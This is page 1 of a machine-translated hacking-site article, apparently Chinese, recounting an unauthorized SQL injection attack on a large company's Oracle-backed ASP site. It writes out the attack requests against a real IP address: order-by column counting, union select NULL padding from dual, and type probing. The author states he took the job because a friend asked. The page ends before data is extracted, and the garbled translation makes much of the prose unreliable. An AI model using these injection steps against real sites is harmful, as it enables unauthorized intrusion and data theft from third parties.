Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > hacker invade > Content
Hot Articles
The MS08-067 crack invad
Smoothwall previews low
The RPC crack invades
GE Interlogix Diamond II
when load_file() invasio
Breaks the IE safe limit
Uses 135 ports to invade
MS08-067 introduces the
The local area network i
Sharp oracle pours into
SonicWALL Customers Prot
SmoothWall Launches Smoo
Invades the WINDOWS serv
Invades RedHat the Linux
Lotus notes also plays t
Recommend Articles
Manual injection ASP scr
Simulates the intruder t
Invades the chinalinux s
The local area network i
Invades the Linux operat
Invades in the process t
Invades once more using
Invades the WINDOWS serv
PHP pours into the invas
Brief analysis Linux sys
Invades the Turkish webs
Invades RedHat the Linux
Buffer overflow analysis
Invades the Linux system
The study contains the c
New Articles
Comodo Disk Encryption n
CRYPTO-MAS-service authe
The criminal attacks Erh
Hackers and malware deve
Five steps to protect co
MI5 hack highlights secu
Kaspersky Mobile Securit
Clavister and Meru Netwo
BioSlimDisk encrypted po
Facebook users are at ri
Europ?organizations awar
Gumblar Web-based attack
2012 Olympic Games suffe
Ties aimed at both Windo
How to recover EFS encry
To famous express company's difficult oracle invasion process (chart)
  Add date: 08/25/2008   Publishing date: 08/25/2008   Hits: 4
Total 2 pages, Current page:1, Jump to page:
 
Familiar and easy
  To flew the great wild goose to have the opinion great friends newly to ask me saying that could for do this company's website, as soon as I listened to the company, thought that the enterprise stood is a trash, good did, then happily complied (moral behavior to be really good!), ha-ha, but afterward only then discovered that I have not imagined that simply.
  

  the asp page, d and google sweep pour into the spot not to have, during the anticipation, the tool error is too big! Therefore the marginal notes, only then this station, then on the one hand opens the time to sweep on the other hand finally the server routine to stand strolls randomly looks manually pours into the spot, a meeting's time comes out a link, like chart:
  

  Routine single quotes, like chart
  

  Very obvious injection, the guess sound code is roughly this:
select XX from XXX where wen='yunna';
  Moreover the database type is oracle, has come the spirit immediately, very little has the opportunity which this kind practices acquiring a skill! It is estimated that the server disposition is definitely good! As a result of this type's database anything good tool, directly has not come manually, such quite stimulates, according to my friend said that this company is very big, the network is also very big, the database quantity is on big enlarges, no wonder uses oracle, therefore gives up the backstage proposing the power the idea! First uses union to inquire the determination field number and storm some sensitive material, submission following url:
http://211.154.103.15/server2.asp?wen= Sichuan ' order by 20--;
  Returns correctly, explained that this table field name is bigger than 20, continues to submit
http://211.154.103.15/server2.asp?wen= Sichuan ' order by 30--;
  Still returned correctly, passes through some rows the guess then submission, 49 returnses are correct, 50 make a mistake, the definite field is 49, then submits following url:
http://211.154.103.15/server2.asp?wen= Sichuan ' union select NULL, NULL, ......, NULL from dual-
  Middle abbreviation, altogether 49 null, because the union inquiry needs the data type match, otherwise makes a mistake, therefore here does not need the digit with null to be possible to avoid the type being wrong, then submission
http://211.154.103.15/server2.asp?wen= Sichuan ' and 1=2 union select 1, NULL, ......, NULL from dual--;
  Makes a mistake the display type not to match, changes into

http://211.154.103.15/server2.asp?wen= Sichuan ' and 1=2 union select '1', NULL, ......, NULL from dual--;
  Returns correctly, explained that first is the character, but below corresponds the position not to demonstrate, continues to attempt following 48 according to above method, when tries to 12 and 13, below corresponded the position to demonstrate, like chart
                                                                    

 
Other pages: : 1 * 2 * Next>>
Prev:How to use excavation chicken invasion legend SF (chart) Next:The example analyzes 80, 512, 3389 and so on port's invasions

Comment:

Category: Home > hacker invade
Home